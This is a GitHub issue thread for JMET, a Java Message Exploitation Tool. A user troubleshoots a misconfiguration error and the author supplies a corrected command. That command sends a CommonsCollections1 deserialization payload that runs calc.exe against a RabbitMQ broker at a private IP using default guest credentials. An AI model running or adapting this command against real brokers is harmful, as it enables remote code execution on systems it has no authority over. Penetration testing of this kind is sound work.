matthiaskaiser / jmet

Java Message Exploitation Tool
MIT License
492 stars 96 forks source link

ERROR d.c.j.JMET [main] Misconfiguration: host or port #5

Closed SyCode7 closed 6 years ago

SyCode7 commented 6 years ago

Hi ,

I am trying out your tool, not yet successful owing to the error below ERROR d.c.j.JMET [main] Misconfiguration: host or port . I am trying our the command below against a RabbitMQ installation: java -jar jmet-0.1.0-all.jar -u guest -pw guest -T rabbit1 -I RabbitMQ -Y CommonsCollections1 calc.exe 172.17.8.127 30000 . Thanks !!

matthiaskaiser commented 6 years ago

Sorry for the late answer. Please try: java -jar jmet-0.1.0-all.jar -u guest -pw guest -T rabbit1 -I RabbitMQ -Y calc.exe -Yp CommonsCollections1 172.17.8.127 30000